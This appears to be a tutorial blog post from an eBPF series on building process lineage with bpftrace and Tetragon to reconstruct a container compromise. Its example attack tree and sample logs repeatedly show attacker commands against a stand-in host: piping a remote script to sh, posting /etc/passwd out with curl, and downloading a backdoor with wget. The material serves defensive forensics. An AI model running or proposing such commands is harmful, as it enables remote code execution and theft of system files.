Process Lineage Archives

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.

Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.

⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list \| grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/<pid>/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (retval > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe